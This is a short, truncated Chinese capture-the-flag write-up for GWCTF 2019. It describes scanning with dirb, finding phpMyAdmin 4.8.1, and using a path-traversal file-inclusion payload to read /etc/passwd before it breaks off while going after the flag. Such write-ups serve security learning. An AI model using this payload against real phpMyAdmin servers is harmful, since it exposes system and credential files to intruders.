[GWCTF 2019]我有一個數據庫

知識點 phpmyadmin任意文件讀取   dirb掃描到後臺有phpmyadmin目錄,訪問一下   版本爲4.81,經查詢,存在遠程文件讀取漏洞 直接上payload讀取passwd文件 /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd     讀取成功,嘗試讀取flag文件 /ph
相關文章
相關標籤/搜索